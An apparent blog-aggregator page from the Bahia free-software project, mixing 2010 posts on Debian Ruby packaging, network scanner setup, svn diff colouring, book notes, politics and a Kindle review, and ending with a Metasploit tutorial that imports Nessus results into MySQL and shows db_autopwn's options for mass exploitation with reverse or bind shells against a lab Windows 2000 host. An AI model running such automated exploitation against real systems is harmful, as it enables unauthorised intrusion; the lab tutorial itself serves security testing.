Ir para o conteúdo
ou

Software livre Brasil

Tela cheia Sugerir um artigo
 Feed RSS

Blogosfera do PSL-Ba

16 de Junho de 2009, 0:00 , por Software Livre Brasil - | 2 pessoas seguindo este artigo.

O Projeto Software Livre Bahia (PSL-BA) é um movimento aberto que busca, através da força cooperativa, disseminar na esfera estadual os ideais de liberdade difundidos pela Fundação Software Livre (FSF), possibilitando assim a democratização do acesso a informação, através dos recursos oferecidos pelo Software Livre. Esta busca tem seus alicerces fundados na colaboração de todos, formando um movimento sinérgico que converge na efetivação dos ideais de Liberdade, Igualdade, Cooperação e Fraternidade.

O Projeto Software Live Bahia é formado pela articulação de indivíduos que atuam em instituições publicas e privadas, empresas, governos ou ONGs, e demais setores da sociedade. Além disso o projeto não é subordinado a qualquer entidade ou grupo social, e não estabelece nenhuma hierarquia formal na sua estrutura interna.


Antonio Terceiro: Building a Debian package out of a Rubygems' .gem file

17 de Outubro de 2010, 0:00, por Software Livre Brasil - 0sem comentários ainda

This post is sort of a status update on ongoing work in Debian's Ruby packaging infrastructure, i.e. the tools used to package Ruby libraries and applications (not the Ruby interpreters themselves) for Debian. We have recently added two new utilities to ruby-pkg-tools:

  • gem2tgz, a tool to convert .gem files into source tarball suitable for being used as a Debian upstream tarball. This is needed because unfortunately several useful Ruby libraries and applications are only officially released in the .gem format.
  • a ruby buildsystem for debhelper, which will automatically build standards-compliant Debian Ruby packages.

To follow the steps in this post, you'll need to build ruby-pkg-tools from the pkg-ruby-extras team subversion repository (e.g., you need ruby-pkg-tools 0.18, which is not in the archive yet). You can also browse the source.

First you have to download a .gem file. Let's took fast_gettext as an example. Enter a temporary directory and download the latest version of the .gem:

$ wget http://rubygems.org/downloads/fast_gettext-0.5.10.gem

Now we need to convert that .gem file into a source tarball to be used by the Debian package:

$ gem2tgz fast_gettext-0.5.10.gem libfast-gettext-ruby-0.5.10.tar.gz

Then uncompress the source tarball, and change to the extracted source directory:

$ tar xzf libfast-gettext-ruby-0.5.10.tar.gz
$ cd libfast-gettext-ruby-0.5.10/

Inside the source directory, you need the generate the Debian package files. For now, you'll use good old dh_make:

$ dh_make -f ../libfast-gettext-ruby-0.5.10.tar.gz --single

Then we have an almost "ready" Debian package. It still misses several documentation issues that need manual checking, but for the sake of the example in this post it is good enough already.

I normally remove all the example files dh_make generates for us:

$ rm -f debian/*.ex debian/*.EX

The next step is to change debian/rules so that it will use our custom Debhelper build system. It's just a matter of adding an extra argument for the dh call. The final rules file must look like this:

#!/usr/bin/make -f

%: dh --buildsystem=ruby $@

Now we build the package. I normally use debuild for that.

$ debuild

After the build lintian will complain a lot, because our package has lots of unchanged dh_make boilerplate, but as fas as this post is concerned, the point is that the package will install the code correctly.

You can check the contents of the package with debc, to make sure everything will be where it should. Our custom debhelper buildsystem is installing Ruby libraries to /usr/lib/ruby/vendor_ruby, so it will available to all Ruby versions installed.

Now that the package is built, you can install and test it:

$ sudo dpkg -i ../libfast-gettext-ruby_0.5.10-1_i386.deb
[...]
$ irb -rfast_gettext
>> FastGettext.add_text_domain 'mutt', :path => '/usr/share/locale'; 1
=> 1
>> FastGettext.text_domain = 'mutt' => "mutt" >> FastGettext.locale = 'pt_BR' => "pt_BR" >> include FastGettext::Translation => Object >> _('Delete') => "Remover"

I tried the above with both irb (currently Ruby 1.8's irb) and irb1.9.1 (Ruby 1.9.2's irb), and it worked fine.

This custom buildsystem still misses proper handling for some special cases:

  • C extensions. They must be installed under /usr/lib/ruby/vendor_ruby/${RUBY_VERSION}/${ARCH}/
  • Libraries that are specific to a single Ruby version. This is the case for example of libraries that got included in Ruby 1.9.x itself but are still useful for Ruby 1.8, or even C extensions that do not compile under Ruby 1.9.x. Those libraries must be installed under /usr/lib/ruby/vendor_ruby/${RUBY_VERSION}/ for pure-Ruby libraries and /usr/lib/ruby/vendor_ruby/${RUBY_VERSION}/${ARCH}/ for C extensions.
  • Applications. Normally an application should use a single and well-known Ruby version, e.g. either Ruby 1.8 or Ruby 1.9.2. So that no matter which is the default Ruby version (the one started when ruby is invoked), the application will work the same.

Next steps include providing a dh-make-ruby tool that will convert the extracted tarball into a proper Ruby Debian package. This tool will eliminate the need for all the manual steps listed above after the gem2tgz invocation and before the package build (debuild).

dh-make-ruby will use the Rubygems metadata that gem2tgz puts inside the generated tarball to automatically fill important files in the package, such as debian/control and debian/copyright. It will also generate a debian/rules that is ready to go for most packages. Hopefull the generated source package will also as lintian-clean as possible.

There is an existing implementation of dh-make-ruby out there, which will be surely taken into account when building our own.

There is also lots of documentation that needs to be written/updated, and all help we get will be appreciated.



Guilherme Jr.: Instalando scanner num servidor para funcionar em rede (Ubuntu Server 10.04)

11 de Outubro de 2010, 0:00, por Software Livre Brasil - 0sem comentários ainda

Tenho uma impressora HP Deskjet F4480 que é multifuncional, ou seja é impressora, scanner e copiadora. Ela já está instalada aqui no meu “servidor” como impressora desde que comprei, só que a função scanner estava totalmente inutilizada pois não tinha conseguido instalar. Hoje, depois de diversos pedidos de Camila para eu instalar o scanner em rede eu pesquisei em trocentos lugares e consegui fazer uma junção de tudo e faze-la funcionar.

No servidor instale esses pacotes:

$sudo apt-get install sane inetutils-inetd

Edite o arquivo /etc/default/saned para que a variável RUN seja igual a yes

RUN=yes

Edite o arquivo /etc/sane.d/saned.conf e acrescente no fim sua rede

192.168.0.0/24

Edite o arquivo /etc/inetd.conf e acrescente no fim o seguinte:

sane-port stream tcp nowait saned.saned /usr/sbin/saned saned

E por último adicione o usuário saned no grupo do lp

$sudo adduser saned lp

Pronto, o servidor já estará pronto, só falta a configuração dos clientes.

No cliente instale esse pacote:

$sudo apt-get install xsane

Edite o arquivo /etc/sane.d/net.conf e acrescente no fim o IP do servidor

192.168.0.1

Pronto, é só abrir o xsane e começar a digitalizar seus documentos.

Share



Mônica Paz: Projeto de Metareciclagem em Salvador

10 de Outubro de 2010, 0:00, por Software Livre Brasil - 0sem comentários ainda

Recebi este email há alguns dias, mas só agora pude divulgar. Acho válida a divulgação mesmo que tardia, pois muita gente fica sem saber o que fazer com o material de informática antigo. Projetos como esse, além de dar um destino mais sustentável ao e-lixo, ajuda na capacitação de jovens e levanta a bandeira do software livre e da metareciclagem.

Espero em breve poder voltar ao meu projeto de construção de  jogos com teclados para fins educacionais.

 

Programa científico apoiado pela Fapesb recicla computadores usados

Aqueles computadores velhos que ficam ocupando espaço em casas e em empresas podem ser doados para o processo de metareciclagem, desenvolvido por pesquisadores em 12 comunidades de Salvador, com o apoio da Fundação de Amparo À Pesquisa do Estado da Bahia (Fapesb). Além de contribuir com o meio ambiente, reduzindo o lixo eletrônico, o programa científico Metarede simultaneamente promove a inclusão sociodigital.

(...)

Locais para doação

Os equipamentos podem ser doados em um dos 12 núcleos de informática, onde funciona o projeto – Engenho Velho de Brotas, Uruguai, Baixa do Fiscal, Alto do Cabrito, Engenho Velho da Federação, Pero Vaz, Costa Azul, Alto de Santa Terezinha, Boca do Rio, Saramandaia, Tancredo Neves e Saubara. A pessoa interessada em doar os materiais tecnológicos pode também ligar para o número (71) 8295-9655 ou acessar o site da Metarede para mais informações.

Além da Fapesb, o projeto Metarede tem o apoio das Universidades Federal da Bahia (UFBA), Estadual de Feira de Santana (UEFS), e do Instituto de Ciência, Tecnologia e Inovações (Ictios).

Veja o artigo completo sobre o Programa Metarede.



Alexandro Silva: Palestras no IV ENSL e participação na H2HC Conference

9 de Outubro de 2010, 0:00, por Software Livre Brasil - 0sem comentários ainda

Em novembro participarei de 02 grandes eventos. Iniciando com o IV ENSL e o VII Fórum Gnome dias 05 e 06 em Natal/RN onde farei 02 palestras.

IV ENSL

No VII Fórum Gnome que ocorrerá no IV ENSL o tema será “Por trás da Infra-estrutura do GNOME: Trabalho para Sysadmins”, nesta apresentação vou mostrar como funciona a infra-estrutura por trás do Projeto Gnome , quem são as pessoas e como se tornar um sysadmin deste grande projeto.

A apresentação aprovada pelos avaliadores foi “Ataques e Contra-medidas – Como proteger seus sistemas na Cyberwar” nela apresentarei a metodologia por trás de um ataque, dicas de como se proteger, e como não poderia deixar de acontecer farei um HandsOn explorando alguns 0days bastantes conhecidos.

H2HC

No final ( 26 a 29 ) estarei no H2HC ( Hackers to Hackers Conference ), evento que reuni a nata dos hackers brasileiros. Os seguintes palestrantes confirmaram presença:

Anchises De Paula – Security Intelligence Analyst, iDefense
Bruno Oliveira – Security Consultant at Trustwave’s Spiderlabs
Carlos Sarraute – Researcher, CoreLabs
Dario Filho – André Grégio – Mestrando e Doutorando – Unicamp
Eric Filiol – Directeur du laboratoire de virologie et de cryptologie opérationnelles – ESIEA Ouest
Fermin Sena – Software Security Engineer, Microsoft
Jeremy Brown – Security Researcher – Tenable
Matthieu Suiche – Founder, MoonSols
Nelson Brito – (Independent Researcher)
Ranieri Romera – Threat Researcher, TrendMicro
Rodrigo Montoro – TrustWave SpiderLabs Researcher
Sergey Bratus – Research Assistant Professor, Computer Science at Dartmouth College
Tony Rodrigues – (Independent Consultant)
Wagner Elias – Research & Development Manager, Conviso IT Security

Com certeza estes eventos trarão muito conhecimento e muiiitttaaa diversão!!!

Agradecimentos:

* A Colivre por patrocinar minha ida ao H2HC Conference.

* A Gnome Foundation e a organização do IV ENSL por permitir minha presença em Natal.

Google Bookmarks Twitter Technorati Favorites Google Gmail LinkedIn Google Reader WordPress Slashdot Reddit Delicious Multiply Digg Identi.ca Share



Alexandro Silva: Palestras no IV ENSL e participação no H2HC Conference

9 de Outubro de 2010, 0:00, por Software Livre Brasil - 0sem comentários ainda

Em novembro participarei de grandes eventos. Iniciando com o IV ENSL e o VII Fórum Gnome dias 05 e 06 em Natal/RN onde farei 02 palestras.

IV ENSL

No VII Fórum Gnome que ocorrerá no IV ENSL o tema será “Por trás da Infra-estrutura do GNOME: Trabalho para Sysadmins”, nesta apresentação vou mostrar como funciona a infra-estrutura por trás do Projeto Gnome , quem são as pessoas e como se tornar um sysadmin deste grande projeto.

A apresentação aprovada pelos avaliadores foi “Ataques e Contra-medidas – Como proteger seus sistemas na Cyberwar” nela apresentarei a metodologia por trás de um ataque, dicas de como se proteger, e como não poderia deixar de acontecer farei um HandsOn explorando alguns 0days bastantes conhecidos.

H2HC

No final ( 26 a 29 ) estarei no H2HC ( Hackers to Hackers Conference ), evento que reuni a nata dos hackers brasileiros. Os seguintes palestrantes confirmaram presença:

Anchises De Paula – Security Intelligence Analyst, iDefense
Bruno Oliveira – Security Consultant at Trustwave’s Spiderlabs
Carlos Sarraute – Researcher, CoreLabs
Dario Filho – André Grégio – Mestrando e Doutorando – Unicamp
Eric Filiol – Directeur du laboratoire de virologie et de cryptologie opérationnelles – ESIEA Ouest
Fermin Sena – Software Security Engineer, Microsoft
Jeremy Brown – Security Researcher – Tenable
Matthieu Suiche – Founder, MoonSols
Nelson Brito – (Independent Researcher)
Ranieri Romera – Threat Researcher, TrendMicro
Rodrigo Montoro – TrustWave SpiderLabs Researcher
Sergey Bratus – Research Assistant Professor, Computer Science at Dartmouth College
Tony Rodrigues – (Independent Consultant)
Wagner Elias – Research & Development Manager, Conviso IT Security

Com certeza estes eventos trarão muito conhecimento e muiiitttaaa diversão!!!

Agradecimentos:

* A Colivre por patrocinar minha ida ao H2HC Conference.

* A Gnome Foundation e a organização do IV ENSL por permitir minha presença em Natal.

Google Bookmarks Twitter Technorati Favorites Google Gmail LinkedIn Google Reader WordPress Slashdot Reddit Delicious Multiply Digg Identi.ca Share



pedro kroger: Notes from The 4-hour Workweek

8 de Outubro de 2010, 0:00, por Software Livre Brasil - 0sem comentários ainda

The 4-Hour Workweek is a great book with lots of good advice. I had some notes about the first edition gathering dust in my hard drive and I decided to post them here. They probably don’t make a lot of sense if you haven’t read the book, but I think they are good for a quick review. There are also a set of notes here.

Definition

New Rich (NR) to be the owner, not the boss nor the emplayee. “To own the trains
and have someone else ensure they run on time.” (p. 23)

NR examples:

  1. employee who gets 90% of work done in 10% of time and use the remaining time to do whatever he likes (e.g. road trips)
  2. student who has an online video rental service and makes $5000 a month working 2 hours a week.

Being a NR is to challenge the status quo but is not to be stupid

  1. Retirement is a worst-case scenario insurance: and it’s difficult to retire and mantain the same standard of living
  2. Interest and energy are cyclical: the best is to have mini-retirements distributed throughout life. The author aims for 1 month overseas for each 2 months of work.
  3. Less is not laziness: The point is to do less meaningless work and produce more meaningful result. 80/20 rule.
  4. The timing is never right
  5. Ask for forgiveness, not permission
  6. Emphasize strengths, don’t fix weaknesses: ”Focus on better use of your best weapons instead of constant repair” (p. 34)
  7. Things in excess become their opposite: Lifestyle design is not intended to increase idle time, but “the positive use of free time”. (p. 35)
  8. Money alone is not the solution
  9. Relative income is more important than absolute income: The ratio between money earned and time worked is what define how a person makes. NR make $5000 per hour. (They may earn 10,000 a month and only work 2 hours a month).
  10. Distress is bad, eustress is good

Conquer fear by defining it. What’s the worst it can happen from a 1-10 scale?

  1. Define your nightmare
  2. What steps to repair te damage (even if temporarily)
  3. What are the positive outcomes?
  4. If you were fired today what would you do to get things under financial control?
  5. What are you putting off out of fear? ”What we fear doing most is usually what we most need to do” (p. 46)
  6. What is costing you to postpone action?
  7. What are you waiting for?

Doing the unrealistic is easier than doing the realistic.

Planning the dreams

  1. Create 2 timelines (6 and 12 months) and list 5 things you dream of having, being, and doing considering you couldn’t fail.
  2. If you don’t know what to think in 1., consider what you’d do if you had $100 million in the bank and what make you excited to wake up in the morning.
  3. Convert each “being” into a “doing”. For example:
    Great cook -> make Christmas dinner without help
    Fluent in Chinese -> have a five-minute conversation with a Chinese co-worker
  4. Highlight (star) the 4 most exciting and important dreams from all columns.
  5. Determine the cost of these dreams and calculate your TMI (target monthly income) for both timelines. Use the tools on the website.
  6. Determine 3 steps for each of the 4 dreams in the 6-month timeline and take the first step now.

If someone has done it, ask for advice.

Elimination

Apply Pareto’s law and beware of Parkinson’s law.

  1. If I had an heart attack and had to work 2 hours per day, what would I do?
  2. If I had a 2nd heart attack and had to work 2 hours per *week*, what would I do?
  3. What time-consuming activities can I remove?
  4. Learn to ask “If this is the only thing I accomplish today, will I be satified with my day?”
  5. Do not multitask.
  6. Go on a low-information diet.
  7. Check email twice a day (and latter once)

Automation

  • Get a personal assistant
  • Eliminate before you delegate
  • Learn to delegate
  • Each delegated task must be both time-consuming and well-defined
  • Request an especific kind of assistant (e.g. “with excelent English”)
  • Request an update after a few hours
  • Break in small milestones
  • Example: “Please reply and confirm what you will plan to do to complet this task”
  • Get an assistent even if you don’t need one (to train how to command)
  • Think “what tasks can I delegate do a VA?”

Income autopilot

He uses Prosoundeffects as an example.

The product can’t take more than $500 to test, has to lend to automation within 4 weeks and can’t require more than 1 day per week of management.

  1. pick an affordable and reachable nich market
  2. brainstorm products: explain the product in one sencence (e.g. ipod: “1000 songs in your pocket”)
  3. price should be between $50–200: higher prices mean fewer units, less costumers, and lower-maintenance costomers.
  4. resell a product
  5. License a product
  6. Create a product: Information is difficult to replicate (legally), e.g. training DVD for security systems.
  7. how to become a top expert
  • join 2 or 3 trade organizations
  • read the 3 top-selling books
  • give one free 1-to-3 hour seminar at a well known university (and/or companies)
  • write 1 or 2 articles in a trade magazine
  • join profnet

Testing the muse

micro test products with Google adsense

  • find competition to determine why my product is better
  • test advertisement with ebay auction (cancel auction on the last minute)
  • set-up google campaign
  1. Market selection
  2. Product brainstorm
  3. Micro-testing
  4. Roll out and automation

Management by absence

  1. 1. 0-50 total units of product shipped: do it all yourself
  2. more than 10 units shipped per week
    add faq to website and answer questions
    find fulfillment services or “mailing services” or mfsanet.org
  3. more than 20 units per week
    outsource
    set up merchant account
  4. have fewer options

Liberation

How to negotiate to work remotely.



Antonio Terceiro: A better svn diff

6 de Outubro de 2010, 0:00, por Software Livre Brasil - 0sem comentários ainda

Since I started using git, every time I need to use Subversion again I suffer. The output of `git diff` is so nice compared to the one produced `svn diff` that it hurts. I've alredy been struggling with that previously.

Now I think I've achieved the perfect solution to make `svn diff` behave just like `git diff`. I've documented it in this post hoping to help other poor souls like me who still have to use Subversion now and then.

Step 1: install colordiff. It's installed on Debian, so the installation required me no effort at all.

Step2 (optional): configure colordiff to use your preferred set of colors. My ~/.colordiffrc contains the following, to match the same colors used by default by `git diff`:

banner=no
color_patches=no
plain=off
newtext=darkgreen
oldtext=darkred
diffstuff=white
cvsstuff=darkyellow

Step 3: create a script to be called by Subversion when running `svn diff`. In my case, I called it svn-diff and stored it in ~/bin (which is in my $PATH), but you can put it in /usr/local/bin or any other directory that is in your $PATH. The contents of ~/bin/svn-diff is the following:

#!/bin/sh

if test -t 1; then
  colordiff -u -L "${3}" -L "${5}" "${6}" "${7}" | less -FRSX
else
  colordiff -u -L "${3}" -L "${5}" "${6}" "${7}"
fi

The conditional tests whether the standard output is connected to a terminal; in the case it is not (e.g. you are redirecting to a file to generate a patch), you do not want to pipe the output to less. The -FRSX options will make less behave exactly as it does when invoked by `git diff`. I've got this tip here.

After creating the script, you need to make it executable:

$ chmod +x ~/bin/svn-diff

Step 4: tell Subversion to use your script instead of plain diff on `svn diff`. To do that, locate the "helpers" section in your Subversion configuration file (~/.subversion/config), and set the diff-cmd setting to the name you gave to your custom script (svn-diff in my case):

[helpers]
diff-cmd = svn-diff

That's it! Now you can almost forget you are using Subversion (until you need to do some merging).

update: added conditional to the svn-diff script to avoid piping to less when redirecting standard output to a file when creating patches.



Tiago Bortoletto Vaz: A tal bolsa e a renda de existência

6 de Outubro de 2010, 0:00, por Software Livre Brasil - 0sem comentários ainda

Continuo cultivando inimizades por não responder de maneira muito simpática a correntes de email de baixo escalão contra esse ou aquele candidato. A última foi um email imbecil, mal escrito, supostamente assinado pelo jornalista Luiz Nassif. Esse Luiz Nassif com “z”, que nada tem a ver com Luis Nassif que conhecemos (ou ao menos deveríamos). O próprio já desmentiu a autoria, mas como as pessoas não costumam exercitar o velho e saudável ceticismo, continuam espalhando esse tipo de infâmia caixas de email afora.

Tenho até evitado discutir política, embora não deixe as provocações de lado nos microblogs e outros tipos de mídia que estão disponíveis pra quem quiser ler, bem diferente das mensagens de email, que invasivamente tomam tempo e espaço no seu servidor e nos seus equipamentos pessoais. Quando fazem isso em conta institucional eu reajo de maneira ainda mais chata. Se esta instituição é um órgão público no qual remente e destinatários trabalham, pode esperar de mim indisposição e grosseria dobradas.

Morando em São Paulo eu decidi evitar discussões sobre política porque, em escala mais elevada que em outros locais, as pessoas em geral não estão expondo nada além do que suas próprias frustrações pessoais, profissionais, seus medos, complexos e mesquinhezas. De política mesmo restam uma ou outra argumentação, rasa, sem sentido político, frases prontas, enlatadas e mal digeridas, travestidas de opinião forte e bem fundamentada. Pessoalmente ainda não encarei uma situação de xenofobia, mas frequentemente me deparo com frustrações – disfarçadas de argumentos – contra nordestinos, aqueles desinformados que colocaram o analfabeto barbudo pra governar o Brasil. É óbvio que uma pessoa com as qualidades que já citei neste post não poderia deixar de colecionar mais uma virtude: a covardia. Aquela que enche as pessoas de coragem atrás de uma tela de computador ou de um automóvel fechado, com vidro fumê e claro, fora de congestionamento pra não correr o risco de ter que encarar o ofendido face a face.

Preciso registrar que em pleno inferno eleitoral eu consegui encontrar um texto bastante lúcido, daqueles que dá vontade de espalhar pra todos os imbecis que ficam enchendo minha caixa com mensagens insanas. Mas não farei isso, pois seria também deselegante. Talvez seja até perda de tempo, pois complexo e frustração não se resolve com textos lúcidos e sim com um histórico de vida intensa e digna, o que obviamente não tem solução sem uma máquina do tempo. Restam então as drogas (e as discussões políticas).

Deixando a ira de lado, quero parabenizar a Maria Rita Kehl, do jornal Estado de São Paulo, por ter tido a sensibilidade e sobretudo a coragem de registrar num veículo tradicionalmente reacionário palavras tão humanas sobre um tema mal debatido, tanto pelas oposições quanto pelos governistas. O partidarismo deveria ser algo totalmente irrelevante diante do que significa uma renda que permite milhões de famílias finalmente terem o que comer, que possibilite que o país minimize um pouco a sua dívida social, seja esta renda chamada de bolsa família, esmola ou o que você preferir.

O texto, publicado em 2 de outubro de 2010, de título “Dois pesos…” nos brinda com essas lindas observações:

“Onde foram parar os verdadeiros humildes de quem o patronato cordial tanto gostava, capazes de trabalhar bem mais que as oito horas regulamentares por uma miséria? Sim, porque é curioso que ninguém tenha questionado o valor do salário oferecido pelo condomínio da capital cearense. A troca do emprego pela Bolsa-Família só seria vantajosa para os supostos espertalhões, preguiçosos e aproveitadores se o salário oferecido fosse inconstitucional: mais baixo do que metade do mínimo…”

“Outra denúncia indignada que corre pela internet é a de que na cidade do interior do Piauí onde vivem os parentes da empregada de algum paulistano, todos os moradores vivem do dinheiro dos programas do governo. Se for verdade, é estarrecedor imaginar do que viviam antes disso. Passava-se fome, na certa, como no assustador Garapa, filme de José Padilha. Passava-se fome todos os dias.”

“O Brasil mudou nesse ponto. Mas ao contrário do que pensam os indignados da internet, mudou para melhor. Se até pouco tempo alguns empregadores costumavam contratar, por menos de um salário mínimo, pessoas sem alternativa de trabalho e sem consciência de seus direitos, hoje não é tão fácil encontrar quem aceite trabalhar nessas condições.”

Assim vou acabar copiando o texto todo :) Leia você mesmo e reflita: http://www.estadao.com.br/estadaodehoje/20101002/not_imp618576,0.php

Agora pare, respire e leia o breve parágrafo abaixo, escrito pelo filósofo André Gorz em 2003, que se ainda vivo poderia pensar o bolsa-* como a realização de um antigo e até então utópico desejo seu, acontecendo bem aqui, no Brasil: a renda de existência. Se depois disso você continuar enchendo a caixa dos outros com asneiras sobre este tema, corra e vá procurar um tratamento.

“A reivindicação da garantia incondicional de uma renda deve, sobretudo, significar de imediato que o trabalho dependente não mais é o único modo de criação de riqueza, nem o único tipo de atividade cujo valor social deve ser reconhecido. A garantia de uma renda suficiente deve enfatizar a importância crescente, virtualmente preponderante, dessa outra economia criadora de riquezas intrínsecas, não mensuráveis, nem permutáveis. Ela deve enfatizar a ruptura entre criação de riqueza e criação de valor; e deve também evidenciar que “desemprego” não significa nem inatividade social, nem inutilidade social, mas somente inutilidade para a valorização direta do capital”

[ATUALIZACÃO]: aparentemente a redatora Maria Rita Kehl foi demitida do Estado de São Paulo em virtude do texto mencionado aqui :(




Mônica Paz: Curso capacita mulheres para criação e edição de vídeos - UFBA

4 de Outubro de 2010, 0:00, por Software Livre Brasil - 0sem comentários ainda


O projeto de pesquisa e extensão Mulher e tecnologia: teorias e práticas na cultura digital, coordenado pelas professoras Karla Brunet (IHAC/Poscultura) e Graciela Natansohn (Facom/PosCom), realiza neste mês de outubro cursos de capacitação  na área da  cultura digital, com a utilização de software livre.

Os  cursos, voltados para mulheres jovens e adultas de Salvador e região metropolitana,  são gratuitos e têm como objetivo a inserção deste público em diversas atividades tecnológicas, estimulando sua participação na criação, produção e promoção da cultura digital.


O primeiro curso é o de Criação e Edição de Vídeos Digitais, que acontece nos dias 09, 23 e 30 de outubro. Voltado para alunas e funcionárias da UFBA  (Universidade Federal da Bahia), o curso terá carga horária de 10h e vai capacitar para a manipulação de câmeras, com a criação, edição e correção de vídeos para web, celular, mp4 e difusão online.


As inscrições acontecem de 4 a 8 de outubro, e podem ser feitas na secretaria do  IHAC, nos turnos vespertino e noturno (procurar Rafael). As vagas são limitadas.

  • O que: curso Criação e Edição de Vídeos Digitais.
  • Quando: 09, 23, 30 de outubro, das 8:30 às 12:30h.
  • Público: alunas e funcionárias da UFBA. Gratuito
  • Local do Curso: sala 08, Facom, Ondina.
  • Inscrição: IHAC (Rafael), tarde e noite.

 



Lucas Almeida Rocha: Kindle 3

2 de Outubro de 2010, 0:00, por Software Livre Brasil - 1Um comentário

My Kindle

I decided that I wanted an e-book reader several months ago but wasn’t fully convinced about any of the available options. Until now. I’ve just bought a Kindle 3 and I really like it! It fixes most of the issues I had with previous Kindle versions (price, size, screen, connectivity, etc) and it’s by far the best e-book reader around. It’s light, small, beautiful, and it has a very good e-ink screen. It’s exactly how Robert Love described it: “the small improvements add up to a significant improvement in usability”. Some more reasons I like Kindle 3 and e-book readers in general:

The screen. I don’t like to read books and long texts on computer screens. It’s just a tiring experience for my eyes. So, I like the obvious fact that e-ink screens look very similar to the usual ink on paper. Kindle 3 has an especially good contrast.

Ergonomics and focus. A couple things really annoy me about the usual printed books. The first one is ergonomics. With the usual books, you end up having to hold them with both hands to keep them open and in a good position for reading. The second is that you always see two pages at the same time. It’s a bit distracting. Kindle 3 is small and light enough to allow you to hold it however you feel more comfortable – including holding it with only one hand. And you only see one page at a time allowing a more focused reading experience.

Fonts and spacings. It’s very frustrating when you buy a book you’re eager to read but the actual reading experience turns out to be quite bad because the publisher chose a too small font and too tight line spacing. That’s especially frustrating if you usually read books while in a bus or tube. With Kindle – and with most e-book readers I guess – you can set the font size, word and line spacings that best fit your personal preferences. I read slightly faster on the Kindle because of that.

Online experience. I buy the great majority of my books (and MP3s) from UK’s Amazon. Hence, having a device that is tightly integrated with my favourite online book store makes the experience of buying books much nicer. It sucks that Kindle is Amazon-specific but this doesn’t affect me much – at least for now.

I know: those are all old news for Kindle and e-book reader owners. But it was good to have such a good feeling about my first e-book reader. It does only one thing and it does it very well.



Alexandro Silva: Usando o Nessus plugin com o MySQL e o db_autopwn no Metasploit

1 de Outubro de 2010, 0:00, por Software Livre Brasil - 0sem comentários ainda

No post anterior apresentei como a integração entre o Nessus e o MSF pode tornar nossa vida bastante interessante.

Agora irei rebuscar os testes usando o MySQL para manter os alvos e suas vulnerabilidades em uma base de dados, explorando-as de forma automatizada com o db_autopwn.

O ambiente dos testes continuará o mesmo:

Host Debian com o Nessus, Metasploit e o MySQL
Host Windows 2000

Pré-requisito para os testes:

Possuir os seguintes itens instalados:

* libdbd-mysql-ruby1.8
* Módulo activerecord ( gem install activerecord )

Preparando o ambiente

Inicei o driver para MySQL no MSF

msf> db_driver mysql

Conectei o banco e criei uma base de dados chamada msf

msf> db_connect msf:******@localhost/msf

Importei o report do Nessus para o banco

msf> nessus_report_get af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8b0

Listando as portas apartir da base de dados msf


msf> db_services

Services
========

created_at info name port proto state updated_at Host Workspace
———- —- —- —- —– —– ———- —- ———
Fri Oct 01 12:06:03 UTC 2010 ftp 21 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 epmap 135 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
ri Oct 01 12:06:03 UTC 2010 135 udp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 netbios-ns 137 udp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 smb 139 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 cifs 445 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 dce-rpc 1025 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 dce-rpc 1028 udp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 www 5800 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 www 5801 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 vnc 5900 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 vnc 5901 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default

Listando as vulnerabilidades apartir da base de dados msf


msf > db_vulns

[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5901 proto=tcp name=NSS-19288 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5901 proto=tcp name=NSS-10342 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=21 proto=tcp name=NSS-22964 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5900 proto=tcp name=NSS-19288 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5900 proto=tcp name=NSS-10342 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5801 proto=tcp name=NSS-24260 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5800 proto=tcp name=NSS-10758 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5800 proto=tcp name=NSS-10107 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5800 proto=tcp name=NSS-43111 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=1028 proto=udp name=NSS-10736 refs=
….


O db-autopwn

O db_autopwn escaneará a base de dados e criará uma lista de módulos específicos para cada vulnerabilidade existente no alvo. A criação destes módulos ocorrerá de 2 formas:

1 – Os exploits serão carregados através da análise da lista de vulnerabilidades. Este tipo de cross-referência depende de alguns padrões como OSVDB, Bugtraq, e CVE para vincular o exploit ao alvo.

2 – Usa portas padrões associadas a cada exploit para localizar os alvos que estão rodando o mesmo serviço.


msf > db_autopwn

[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port (default)
-q Disable exploit module output
-R [rank] Only run modules with a minimal rank
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
